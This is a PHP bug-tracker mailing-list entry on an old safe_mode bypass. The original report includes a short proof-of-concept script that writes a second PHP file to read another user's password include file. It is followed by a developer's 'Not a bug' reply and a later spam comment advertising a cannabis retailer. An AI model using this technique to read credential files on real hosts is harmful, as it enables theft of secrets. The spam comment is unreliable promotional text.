Bug #25149 [Com]: safe_mode bypass
| From: | lildurk25149 at gmail dot com | Date: | Wed, 01 Sep 2021 18:53:20 +0000 |
| Subject: | Bug #25149 [Com]: safe_mode bypass | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-236347@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=25149&edit=1
ID: 25149
Comment by: lildurk25149 at gmail dot com
Reported by: marrtins at hackers dot lv
Summary: safe_mode bypass
Status: Not a bug
Type: Bug
Package: Scripting Engine problem
Operating System: Linux
PHP Version: 4.3.1
Block user comment: N
Private report: N
New Comment:
Lil Durk is a private agency dedicated to providing responsible access to legal cannabis for adults
aged 19 and older. Weâre an exclusively online retailer and wholesaler for recreational
cannabis and a trusted source for information about cannabis and cannabis-related issues. We believe
our work is meaningful and we take pride in our mandate to promote the socially responsible use of
legal cannabis. https://lildurk.com/
Previous Comments:
------------------------------------------------------------------------
[2003-08-19 11:18:40] iliaa@php.net
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to
report
a bug at http://bugs.php.net/how-to-report.php
This is how safe_mode works.
------------------------------------------------------------------------
[2003-08-19 11:15:33] marrtins at hackers dot lv
Description:
------------
apache_1.3.27
httpd.conf
----------
User webmaster
Group nobody
./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite
======================================
php-4.3.0
php.ini
---------
safe_mode = On
./configure \
--with-mysql=/usr/local \
--with-mcrypt=/usr/local/lib/libmcrypt \
--with-apache=../apache_1.3.27 \
--enable-track-vars \
--with-gd=/usr/local \
--with-interbase=/opt/interbase \
--enable-trans-sid \
--with-png-dir=/usr/local \
--with-jpeg-dir=/usr/local \
--with-zlib-dir=/usr/local \
--enable-sockets \
--with-gettext \
--with-xml \
--enable-ftp \
--with-imap=/root/.hore_imp/imap-2002.RC10 \
--with-iconv=/usr/local/
======================================
~/public_html> ls -al *
drwxr-xr-x 3 test users 4096 aug 19 19:05 .
drwx--x--x 5 test users 4096 aug 19 19:04 ..
-rw-r--r-- 1 test users 146 aug 19 18:47 hack.php
drwxrwxrwx 2 test users 4096 aug 19 19:03 test
after accessing http://some_server/~test/hack.php
php makes test/stole.php
~/public_html> ls -al test
drwxrwxrwx 2 test users 4096 aug 19 19:07 .
drwxr-xr-x 3 test users 4096 aug 19 19:05 ..
-rw-r--r-- 1 webmaste nobody 61 aug 19 19:07 stole.php
after that http://some_server/~test/test/stole.php locally
reads /www/secret/pass.inc.php owned by webmaster
Reproduce code:
---------------
<?
$data='<? $data = file(\'/www/secret/pass.inc.php\'); print_r($data);
?>';
$f=fopen('/home/test/public_html/test/stole.php', 'w');
fwrite($f, $data);
fclose($f);
?>
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=25149&edit=1